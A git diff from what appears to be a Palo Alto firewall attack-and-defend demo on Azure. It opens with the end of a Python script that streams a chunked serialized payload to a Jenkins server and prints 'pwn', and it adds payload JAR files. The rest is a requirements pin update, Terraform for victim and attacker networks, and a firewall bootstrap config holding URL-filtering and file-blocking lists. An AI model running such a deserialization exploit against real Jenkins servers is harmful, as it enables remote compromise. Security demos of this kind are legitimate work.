data=create_payload_chunked(), proxies=proxies) + + +def null_payload(): + yield b" " + +def create_payload(): + payload = PREAMBLE + PROTO + FILE_SER + + return payload + +def create_payload_chunked(): + yield PREAMBLE + yield PROTO + yield FILE_SER + +def main(): + print("start") + + session = str(uuid.uuid4()) + + t = threading.Thread(target=download, args=(URL, session)) + t.start() + + time.sleep(1) + print("pwn") + #upload(URL, session, create_payload()) + + upload_chunked(URL, session, "asdf") + +if __name__ == "__main__": + main() diff --git a/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar b/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar new file mode 100644 index 00000000..30fad12d Binary files /dev/null and b/azure/Jenkins_proj-master/payload/ezmorph-1.0.6.jar differ diff --git a/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar b/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar new file mode 100644 index 00000000..a47f128a Binary files /dev/null and b/azure/Jenkins_proj-master/payload/json-lib-2.4-jenkins-2.jar differ diff --git a/azure/Jenkins_proj-master/payload/payload.jar b/azure/Jenkins_proj-master/payload/payload.jar new file mode 100644 index 00000000..51e0bcc9 Binary files /dev/null and b/azure/Jenkins_proj-master/payload/payload.jar differ diff --git a/azure/Jenkins_proj-master/requirements.txt b/azure/Jenkins_proj-master/requirements.txt index 98083fd2..f5126452 100644 --- a/azure/Jenkins_proj-master/requirements.txt +++ b/azure/Jenkins_proj-master/requirements.txt @@ -1,183 +1,227 @@ -adal -antlr4-python3-runtime -applicationinsights -argcomplete -asn1crypto -azure-batch -azure-cli -azure-cli-acr -azure-cli-acs -azure-cli-advisor -azure-cli-ams -azure-cli-appservice -azure-cli-backup -azure-cli-batch -azure-cli-batchai -azure-cli-billing -azure-cli-botservice -azure-cli-cdn -azure-cli-cloud -azure-cli-cognitiveservices -azure-cli-command-modules-nspkg -azure-cli-configure -azure-cli-consumption -azure-cli-container -azure-cli-core -azure-cli-cosmosdb -azure-cli-dla -azure-cli-dls -azure-cli-dms -azure-cli-eventgrid -azure-cli-eventhubs -azure-cli-extension -azure-cli-feedback -azure-cli-find -azure-cli-hdinsight -azure-cli-interactive -azure-cli-iot -azure-cli-iotcentral -azure-cli-keyvault -azure-cli-kusto -azure-cli-lab -azure-cli-maps -azure-cli-monitor -azure-cli-network -azure-cli-nspkg -azure-cli-policyinsights -azure-cli-privatedns -azure-cli-profile -azure-cli-rdbms -azure-cli-redis -azure-cli-relay -azure-cli-reservations -azure-cli-resource -azure-cli-role -azure-cli-search -azure-cli-security -azure-cli-servicebus -azure-cli-servicefabric -azure-cli-signalr -azure-cli-sql -azure-cli-sqlvm -azure-cli-storage -azure-cli-telemetry -azure-cli-vm -azure-common -azure-datalake-store -azure-functions-devops-build -azure-graphrbac -azure-keyvault -azure-mgmt-advisor -azure-mgmt-applicationinsights -azure-mgmt-authorization -azure-mgmt-batch -azure-mgmt-batchai -azure-mgmt-billing -azure-mgmt-botservice -azure-mgmt-cdn -azure-mgmt-cognitiveservices -azure-mgmt-compute -azure-mgmt-consumption -azure-mgmt-containerinstance -azure-mgmt-containerregistry -azure-mgmt-containerservice -azure-mgmt-cosmosdb -azure-mgmt-datalake-analytics -azure-mgmt-datalake-nspkg -azure-mgmt-datalake-store -azure-mgmt-datamigration -azure-mgmt-devtestlabs -azure-mgmt-dns -azure-mgmt-eventgrid -azure-mgmt-eventhub -azure-mgmt-hdinsight -azure-mgmt-iotcentral -azure-mgmt-iothub -azure-mgmt-iothubprovisioningservices -azure-mgmt-keyvault -azure-mgmt-kusto -azure-mgmt-loganalytics -azure-mgmt-managementgroups -azure-mgmt-maps -azure-mgmt-marketplaceordering -azure-mgmt-media -azure-mgmt-monitor -azure-mgmt-msi -azure-mgmt-network -azure-mgmt-nspkg -azure-mgmt-policyinsights -azure-mgmt-privatedns -azure-mgmt-rdbms -azure-mgmt-recoveryservices -azure-mgmt-recoveryservicesbackup -azure-mgmt-redis -azure-mgmt-relay -azure-mgmt-reservations -azure-mgmt-resource -azure-mgmt-search -azure-mgmt-security -azure-mgmt-servicebus -azure-mgmt-servicefabric -azure-mgmt-signalr -azure-mgmt-sql -azure-mgmt-sqlvirtualmachine -azure-mgmt-storage -azure-mgmt-trafficmanager -azure-mgmt-web -azure-multiapi-storage -azure-nspkg -azure-storage -azure-storage-blob -azure-storage-common -azure-storage-nspkg -bcrypt -certifi -cffi -chardet -colorama -cryptography -fabric -humanfriendly -idna -invoke -ipaddress -isodate -Jinja2 -jmespath -knack -MarkupSafe -mock -msrest -msrestazure -oauthlib -pan-python -pandevice -paramiko -pbr -portalocker -prompt-toolkit -psutil -pyasn1 -pycparser -pydocumentdb -Pygments -PyJWT -PyNaCl -pyOpenSSL -pyperclip -python-dateutil -python-terraform -pytz -PyYAML -requests -requests-oauthlib -scp -six -sshtunnel -tabulate -urllib3 -vsts -vsts-cd-manager -wcwidth -websocket-client -xmltodict \ No newline at end of file +adal==1.2.1 +amqp==2.4.2 +antlr4-python3-runtime==4.7.2 +applicationinsights==0.11.7 +argcomplete==1.9.5 +asgiref==3.0.0 +asn1crypto==0.24.0 +async-timeout==3.0.1 +atomicwrites==1.3.0 +attrs==19.1.0 +autobahn==19.3.3 +Automat==0.7.0 +azure-batch==6.0.0 +azure-cli==2.0.63 +azure-cli-acr==2.2.5 +azure-cli-acs==2.3.22 +azure-cli-advisor==2.0.0 +azure-cli-ams==0.4.5 +azure-cli-appservice==0.2.18 +azure-cli-backup==1.2.4 +azure-cli-batch==4.0.0 +azure-cli-batchai==0.4.8 +azure-cli-billing==0.2.1 +azure-cli-botservice==0.1.10 +azure-cli-cdn==0.2.3 +azure-cli-cloud==2.1.1 +azure-cli-cognitiveservices==0.2.5 +azure-cli-command-modules-nspkg==2.0.2 +azure-cli-configure==2.0.22 +azure-cli-consumption==0.4.2 +azure-cli-container==0.3.16 +azure-cli-core==2.0.63 +azure-cli-cosmosdb==0.2.10 +azure-cli-deploymentmanager==0.1.0 +azure-cli-dla==0.2.5 +azure-cli-dls==0.1.9 +azure-cli-dms==0.1.3 +azure-cli-eventgrid==0.2.3 +azure-cli-eventhubs==0.3.4 +azure-cli-extension==0.2.5 +azure-cli-feedback==2.2.1 +azure-cli-find==0.3.2 +azure-cli-hdinsight==0.3.3 +azure-cli-interactive==0.4.3 +azure-cli-iot==0.3.8 +azure-cli-iotcentral==0.1.6 +azure-cli-keyvault==2.2.14 +azure-cli-kusto==0.2.2 +azure-cli-lab==0.1.7 +azure-cli-maps==0.3.4 +azure-cli-monitor==0.2.13 +azure-cli-network==2.3.7 +azure-cli-nspkg==3.0.3 +azure-cli-policyinsights==0.1.2 +azure-cli-privatedns==1.0.0 +azure-cli-profile==2.1.5 +azure-cli-rdbms==0.3.10 +azure-cli-redis==0.4.2 +azure-cli-relay==0.1.4 +azure-cli-reservations==0.4.2 +azure-cli-resource==2.1.14 +azure-cli-role==2.6.0 +azure-cli-search==0.1.1 +azure-cli-security==0.1.1 +azure-cli-servicebus==0.3.4 +azure-cli-servicefabric==0.1.17 +azure-cli-signalr==1.0.0 +azure-cli-sql==2.2.2 +azure-cli-sqlvm==0.1.1 +azure-cli-storage==2.4.1 +azure-cli-telemetry==1.0.2 +azure-cli-vm==2.2.19 +azure-common==1.1.20 +azure-datalake-store==0.0.39 +azure-functions-devops-build==0.0.21 +azure-graphrbac==0.60.0 +azure-keyvault==1.1.0 +azure-mgmt-advisor==2.0.1 +azure-mgmt-applicationinsights==0.1.1 +azure-mgmt-authorization==0.50.0 +azure-mgmt-batch==6.0.0 +azure-mgmt-batchai==2.0.0 +azure-mgmt-billing==0.2.0 +azure-mgmt-botservice==0.1.0 +azure-mgmt-cdn==3.1.0 +azure-mgmt-cognitiveservices==3.0.0 +azure-mgmt-compute==4.6.1 +azure-mgmt-consumption==2.0.0 +azure-mgmt-containerinstance==1.4.0 +azure-mgmt-containerregistry==2.7.0 +azure-mgmt-containerservice==4.4.0 +azure-mgmt-cosmosdb==0.5.2 +azure-mgmt-datalake-analytics==0.2.1 +azure-mgmt-datalake-nspkg==3.0.1 +azure-mgmt-datalake-store==0.5.0 +azure-mgmt-datamigration==0.1.0 +azure-mgmt-deploymentmanager==0.1.0 +azure-mgmt-devtestlabs==2.2.0 +azure-mgmt-dns==2.1.0 +azure-mgmt-eventgrid==2.0.0 +azure-mgmt-eventhub==2.3.0 +azure-mgmt-hdinsight==0.2.1 +azure-mgmt-iotcentral==1.0.0 +azure-mgmt-iothub==0.7.0 +azure-mgmt-iothubprovisioningservices==0.2.0 +azure-mgmt-keyvault==1.1.0 +azure-mgmt-kusto==0.3.0 +azure-mgmt-loganalytics==0.2.0 +azure-mgmt-managementgroups==0.1.0 +azure-mgmt-maps==0.1.0 +azure-mgmt-marketplaceordering==0.1.0 +azure-mgmt-media==1.1.1 +azure-mgmt-monitor==0.5.2 +azure-mgmt-msi==0.2.0 +azure-mgmt-network==2.6.0 +azure-mgmt-nspkg==3.0.2 +azure-mgmt-policyinsights==0.2.0 +azure-mgmt-privatedns==0.1.0 +azure-mgmt-rdbms==1.7.1 +azure-mgmt-recoveryservices==0.1.1 +azure-mgmt-recoveryservicesbackup==0.1.2 +azure-mgmt-redis==6.0.0 +azure-mgmt-relay==0.1.0 +azure-mgmt-reservations==0.3.1 +azure-mgmt-resource==2.1.0 +azure-mgmt-search==2.0.0 +azure-mgmt-security==0.1.0 +azure-mgmt-servicebus==0.5.3 +azure-mgmt-servicefabric==0.2.0 +azure-mgmt-signalr==0.1.1 +azure-mgmt-sql==0.12.0 +azure-mgmt-sqlvirtualmachine==0.2.0 +azure-mgmt-storage==3.1.1 +azure-mgmt-trafficmanager==0.51.0 +azure-mgmt-web==0.41.0 +azure-multiapi-storage==0.2.3 +azure-nspkg==3.0.2 +azure-storage==0.36.0 +azure-storage-blob==1.3.1 +azure-storage-common==1.4.0 +azure-storage-file==1.4.0 +azure-storage-nspkg==3.1.0 +bcrypt==3.1.6 +billiard==3.6.0.0 +celery==4.3.0 +certifi==2019.3.9 +cffi==1.12.3 +chardet==3.0.4 +collections2==0.3.0 +colorama==0.4.1 +constantly==15.1.0 +cryptography==2.4.2 +decorator==4.4.0 +Django==2.2.8 +django-widget-tweaks==1.4.3 +docker==3.7.2 +docker-pycreds==0.4.0 +fabric==2.4.0 +gitdb2==2.0.5 +GitPython==2.1.11 +gunicorn==19.9.0 +humanfriendly==4.18 +hyperlink==18.0.0 +idna==2.8 +incremental==17.5.0 +invoke==1.2.0 +ipaddress==1.0.22 +isodate==0.6.0 +Jinja2==2.10.1 +jmespath==0.9.4 +jsonpath-ng==1.4.3 +knack==0.5.4 +kombu==4.5.0 +MarkupSafe==1.1.1 +mock==2.0.0 +more-itertools==7.0.0 +msrest==0.6.6 +msrestazure==0.6.0 +oauthlib==3.0.1 +oyaml==0.9 +pan-python==0.14.0 +pandevice==0.6.6 +paramiko==2.4.2 +passlib==1.7.1 +pbr==5.2.0 +pluggy==0.9.0 +ply==3.11 +portalocker==1.2.1 +prompt-toolkit==1.0.15 +psutil==5.6.6 +py==1.8.0 +pyAesCrypt==0.4.2 +pyasn1==0.4.5 +pycparser==2.19 +pydocumentdb==2.3.3 +Pygments==2.3.1 +PyHamcrest==1.9.0 +PyJWT==1.7.1 +PyNaCl==1.3.0 +pyOpenSSL==19.0.0 +pyperclip==1.7.0 +pytest==4.4.0 +pytest-django==3.4.8 +python-dateutil==2.8.0 +python-terraform==0.10.0 +pytz==2019.1 +PyYAML==5.1 +requests==2.21.0 +requests-oauthlib==1.2.0 +scp==0.13.2 +six==1.12.0 +smmap2==2.0.5 +sqlparse==0.3.0 +sshtunnel==0.1.4 +tabulate==0.8.3 +twisted>=19.7.0 +txaio==18.8.1 +urllib3==1.24.2 +vine==1.3.0 +virtualenv==16.4.3 +virtualenv-clone==0.5.2 +vsts==0.1.25 +vsts-cd-manager==1.0.2 +wcwidth==0.1.7 +websocket-client==0.56.0 +xmltodict==0.12.0 +zope.interface==4.6.0 diff --git a/azure/Jenkins_proj-working/WebInBootstrap/azure_vars.tf b/azure/Jenkins_proj-working/WebInBootstrap/azure_vars.tf new file mode 100644 index 00000000..45ed9eb8 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInBootstrap/azure_vars.tf @@ -0,0 +1,2 @@ +variable "RG_Name" {} +variable "Azure_Region" {} diff --git a/azure/Jenkins_proj-working/WebInBootstrap/bootstrap.tf b/azure/Jenkins_proj-working/WebInBootstrap/bootstrap.tf new file mode 100644 index 00000000..0c187a78 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInBootstrap/bootstrap.tf @@ -0,0 +1,10 @@ +resource "random_id" "storage_account" { + byte_length = 2 +} +resource "azurerm_storage_account" "bootstrap" { + name = "bootstrap${lower(random_id.storage_account.hex)}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + location = "${azurerm_resource_group.resourcegroup.location}" + account_tier = "Standard" + account_replication_type = "LRS" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInBootstrap/outputs.tf b/azure/Jenkins_proj-working/WebInBootstrap/outputs.tf new file mode 100644 index 00000000..4c5d6346 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInBootstrap/outputs.tf @@ -0,0 +1,9 @@ +output "Resource_Group" { + value = "${azurerm_resource_group.resourcegroup.name}" +} +output "Storage_Account_Access_Key" { + value = "${azurerm_storage_account.bootstrap.primary_access_key}" +} +output "Bootstrap_Bucket" { + value="bootstrap${lower(random_id.storage_account.hex)}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInBootstrap/resourcegroup.tf b/azure/Jenkins_proj-working/WebInBootstrap/resourcegroup.tf new file mode 100644 index 00000000..7c24c105 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInBootstrap/resourcegroup.tf @@ -0,0 +1,14 @@ +# Configure the Microsoft Azure Provider +provider "azurerm" {} + +resource "random_id" "resource_group" { + byte_length = 2 +} + +# ********** RESOURCE GROUP ********** + +# Create a resource group +resource "azurerm_resource_group" "resourcegroup" { + name = "${var.RG_Name}-${lower(random_id.resource_group.hex)}" + location = "${var.Azure_Region}" +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInBootstrap/terraform.tfvars b/azure/Jenkins_proj-working/WebInBootstrap/terraform.tfvars new file mode 100644 index 00000000..9f03abf8 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInBootstrap/terraform.tfvars @@ -0,0 +1,3 @@ +RG_Name = "" + +Azure_Region = "" diff --git a/azure/Jenkins_proj-working/WebInDeploy/azure_vars.tf b/azure/Jenkins_proj-working/WebInDeploy/azure_vars.tf new file mode 100644 index 00000000..3d83fa8d --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/azure_vars.tf @@ -0,0 +1,25 @@ +variable "RG_Name" {} +variable "Attack_RG_Name" {} +variable "Azure_Region" {} +variable "Admin_Username" {} +variable "Admin_Password" {} +variable "Bootstrap_Storage_Account" {} +variable "Storage_Account_Access_Key" {} +variable "Storage_Account_Fileshare" {} +variable "Storage_Account_Fileshare_Directory" {} +variable "Web_Initscript_Path" {} +variable "Attack_Initscript_Path" {} +variable "Victim_CIDR" {} +variable "Attack_CIDR" {} +variable "Mgmt_Subnet_CIDR" {} +variable "Untrust_Subnet_CIDR" {} +variable "Trust_Subnet_CIDR" {} +variable "AppGW_Subnet_CIDR" {} +variable "Web_Subnet_CIDR" {} +variable "Attack_Subnet_CIDR" {} +variable "FW_Mgmt_IP" {} +variable "FW_Untrust_IP" {} +variable "FW_Trust_IP" {} +variable "WebLB_IP" {} +variable "Web_IP" {} +variable "Attack_IP" {} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/bootstrap.tf b/azure/Jenkins_proj-working/WebInDeploy/bootstrap.tf new file mode 100644 index 00000000..3fa38e0a --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/bootstrap.tf @@ -0,0 +1,18 @@ +resource "random_id" "storage_account" { + byte_length = 8 +} + +resource "azurerm_storage_account" "jenkins" { + name = "${lower(random_id.storage_account.hex)}" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + location = "${azurerm_resource_group.resourcegroup.location}" + account_tier = "Standard" + account_replication_type = "LRS" +} + +resource "azurerm_storage_share" "bootstrap" { + name = "bootstrap" + resource_group_name = "${azurerm_resource_group.resourcegroup.name}" + storage_account_name = "${azurerm_storage_account.jenkins.name}" + quota = 1 +} \ No newline at end of file diff --git a/azure/Jenkins_proj-working/WebInDeploy/bootstrap/bootstrap.xml b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/bootstrap.xml new file mode 100644 index 00000000..e528f907 --- /dev/null +++ b/azure/Jenkins_proj-working/WebInDeploy/bootstrap/bootstrap.xml @@ -0,0 +1,2620 @@ + + + + + + $1$fhfqjgjl$UKU4H9KWTwmKrxropu9BK. + + + yes + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg== + + + + + + + + + + + + + yes + 5 + + + yes + 5 + + + yes + 5 + + + yes + 10 + + + yes + 5 + + + + yes + + + + 10 + 10 + + 100 + 50 + + + + 10 + 10 + + 100 + 50 + + + + + + 100 + yes + + + + + + + + Panorama + 1.2.3.4 + test@yourdomain.com + test@yourdomain.com + + + + + + + + + UDP + 514 + BSD + 1.2.3.4 + LOG_USER + + + + + + + + + Sample_Email_Profile + + (severity eq critical) + Email Critical System Logs + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + All Logs + no + + Sample_Syslog_Profile + + + + + + + + + traffic + All Logs + no + + Sample_Syslog_Profile + + + + threat + All Logs + no + + Sample_Syslog_Profile + + + + + Sample_Email_Profile + + Email Malicious Wildfire Verdicts + wildfire + (verdict eq malicious) + no + + + + Sample_Email_Profile + + Email Phishing Wildfire Verdicts + wildfire + (verdict eq phishing) + no + + + wildfire + All Logs + no + + Sample_Syslog_Profile + + + + url + All Logs + no + + Sample_Syslog_Profile + + + + data + All Logs + no + + Sample_Syslog_Profile + + + + gtp + All Logs + no + + Sample_Syslog_Profile + + + + tunnel + All Logs + no + + Sample_Syslog_Profile + + + + auth + All Logs + no + + Sample_Syslog_Profile + + + + + + + + + last-7-calendar-days + 500 + 50 + Host-visit malicious sites plus + daily + (category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing) + + + repeatcnt + src + + from + srcuser + category + action + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Hosts visit malicious sites + daily + (category eq command-and-control) or (category eq hacking) or (category eq malware) or (category eq phishing) + + + repeatcnt + src + + from + srcuser + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Hosts visit questionable sites + daily + (category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown) + + + repeatcnt + src + + from + srcuser + + + repeatcnt + + + + + + last-7-calendar-days + 500 + 50 + Host-visit quest sites plus + daily + (category eq dynamic-dns) and (category eq parked) and (category eq questionable) and (category eq unknown) + Detail of hosts visiting questionable URLs + + + repeatcnt + src + + from + srcuser + category + action + + + repeatcnt + + + + + + last-30-calendar-days + 500 + 10 + Wildfire malicious verdicts + daily + (app neq smtp) and (category neq benign) + Files uploaded or downloaded that were later found to be malicious. This is a summary. Act on real-time email. + + + repeatcnt + + filedigest + container-of-app + app + category + filetype + rule + + + repeatcnt + + + + + + last-30-calendar-days + 500 + 10 + Wildfire verdicts SMTP + daily + (app eq smtp) and (category neq benign) + Links sent from emails found to be malicious. + + + repeatcnt + + filedigest + container-of-app + app + category + filetype + rule + subject + sender + recipient + misc + + + + + + last-30-calendar-days + 500 + 50 + Clients sinkholed + (rule eq 'DNS Sinkhole Block') + daily + + + repeatcnt + from + + src + srcuser + + + repeatcnt + + + + + + + + + + Clients sinkholed + + + Wildfire malicious verdicts + + + Wildfire verdicts SMTP + + + Hosts visit malicious sites + + + Host-visit malicious sites plus + + + Hosts visit questionable sites + + + Host-visit quest sites plus + + + yes + + + Possible Compromise + + + + + + + Possible Compromise + + + + Sample_Email_Profile + + + + + + + + + + + + + + + + + + + + 3 + 5 + wait-recover + + + + + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + 10000 + 10000 + 40000 + + no + + + + + + + + 2 + 100 + + + + + + 10 + 100 + + + + + + 2 + 100 + + + yes + yes + yes + no + global + + + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + + 8 + + + + + aes-128-cbc + + + sha256 + + + group19 + + + 8 + + + + + aes-256-cbc + + + sha384 + + + group20 + + + 8 + + + + + + + + aes-128-cbc + 3des + + + sha1 + + + group2 + + 1 + + + + + + aes-128-gcm + + + none + + + group19 + + 1 + + + + + + aes-256-gcm + + + none + + + group20 + + 1 + + + + + + + aes-128-cbc + + + sha1 + + + + + + + + + + + real-time + + + high + + + high + + + medium + + + medium + + + low + + + low + + + low + + + + + + + + + + + + + + + WebFW1 + UTC + updates.paloaltonetworks.com + yes + + + 10.0.0.2 + 10.0.0.2 + + + Gold 1.0 - PANOS 8.0 + + yes + yes + + + + + + + + + + + yes + no + no + no + + + + + + + 00:00 + download-and-install + + 48 + + + + yes + yes + yes + yes + yes + yes + yes + yes + + + + + 3 + download-and-install + + + + + + + + yes + + + FQDN + + + + yes + no + no + no + + + c3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCQVFDR3ZDNHZmYk1JbXVSSTlnNGx5SkJRQ0NNSUFjZk0wemVMM2VFM0REdlRkRmYrYzZLOHVJUlRwUk01MHo0TVEwTXd1TEo0Rk1iclQ5ZVRsaEZaZitYcjVBZzJ2R2xIRE9zcEEwSWtmbzZXaTBwYnQ1d1hYV1YwOCs1Tk9GRkpXNm13YThvWUV3RUtHZWlDTEJnRWMyRTgzaXo3alNiNkRST3hXakxDOWVkZmR0ZmNTSzhlNW1kbmRZUkVMK3ZoaSt1QUZac0RpTEhMWGNpeFlaU0xML0xvcmIzK2hnOVdsejQwR0IwMmVsRk1Oc3hJSFdzVUQxMDFVelJzWWFxYWVVWjRuNDlxOVhtc1ZxazVkbHRhcTdtYitWNTZqaVBvVG1wZGNjNjZycGtqWFNjK2NFWGMzaitNbUFRd1F5RkFjbDI2dzlGb3pvUmo4MmY0REx3SncwaEIgamZyYW5rbGluMg== + 8.8.8.8 + 8.8.4.4 + + + + yes + yes + + + + + 10 + + + 30 + + + 1000 + + + 2000 + + + 5 + + + 5 + + + 1 + + + 10 + + + 2 + + + yes + yes + + + yes + + + no + + + + + + + + + + + + + + + + ELB-HealthChecker/2.0 + http-req-headers + + + + + + + session + no + + + infrastructure + networking + browser-based + 1 + + + + + + + + + + + + allow + no + yes + + + Inbound + + + default + + + deny + no + yes + default + + + + + + + + + + + financial-services + government + health-and-medicine + Custom-No-Decrypt + + + any + + + + + + any + + + any + + + any + + + any + + + any + + Recommended_Decryption_Profile + no-decrypt + yes + This rule does not do Decryption. This rule is validating SSL Protocol Communications. + + + + any + + + any + + + + + + any + + + any + + + any + + + any + + + any + + Recommended_Decryption_Profile + no-decrypt + This rule does not do Decryption. This rule is validating SSL Protocol Communications. + + + + + + + + + + Outbound to the Internet + + + Inbound from the Internet + + + Internal to Internal + + +

+ + 2600:5200::1 + + + 10.0.1.10 + +
+ + + + + + + + http://www.team-cymru.org/Services/Bogons/fullbogons-ipv4.txt + IPv4 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html + + + + + + + + + + http://www.team-cymru.org/Services/Bogons/fullbogons-ipv6.txt + IPv6 addresses that should not be routed across the Internet. Either reserved IP address space or unassigned and may be used for malicious purposes. More information: http://www.team-cymru.com/bogon-reference.html + + + + + + + + + + + + + + yes + yes + yes + yes + yes + yes + + + yes + yes + + + no + no + + + yes + yes + + + tls1-2 + no + no + no + no + + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + dll + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + any + + + 7z + bat + chm + class + cpl + hlp + hta + jar + ocx + pif + scr + torrent + vbe + wsf + + both + block + + + + + + + + any + + + any + + both + alert + + + + + + + + any + + + any + + both + alert + + + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + medium + + any + any + single-packet + + + + + + + low + informational + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + high + critical + + any + any + single-packet + + + + + + + low + informational + medium + + any + any + disable + + + + + + + + + + + + + + 2600:5200::1 + + disable + + + + + + + + any + + any + any + disable + + + + + + + + + + + + + + 72.5.65.111 + 2600:5200::1 + + single-packet + + + + + + + + + + + + extended-capture + + pan-sinkhole-default-ip + ::1 + + + + + + + + + any + + any + any + single-packet + + + + + + + + + + + + + + + + + + high + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + command-and-control + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + Black-List + White-List + + + yes + yes + yes + block + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + White-List + + + command-and-control + hacking + malware + phishing + Black-List + + + + + + + + medium + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + + + block + + abortion + abused-drugs + adult + alcohol-and-tobacco + auctions + business-and-economy + computer-and-internet-info + content-delivery-networks + copyright-infringement + dating + dynamic-dns + educational-institutions + entertainment-and-arts + extremism + financial-services + gambling + games + government + hacking + health-and-medicine + home-and-garden + hunting-and-fishing + insufficient-content + internet-communications-and-telephony + internet-portals + job-search + legal + malware + military + motor-vehicles + music + news + not-resolved + nudity + online-storage-and-backup + parked + peer-to-peer + personal-sites-and-blogs + philosophy-and-political-advocacy + phishing + private-ip-addresses + proxy-avoidance-and-anonymizers + questionable + real-estate + recreation-and-hobbies + reference-and-research + religion + search-engines + sex-education + shareware-and-freeware + shopping + social-networking + society + sports + stock-advice-and-tools + streaming-media + swimsuits-and-intimate-apparel + training-and-tools + translation + travel + unknown + weapons + web-advertisements + web-based-email + web-hosting + + + + + + + + high + + abortion + abused-drugs + adult 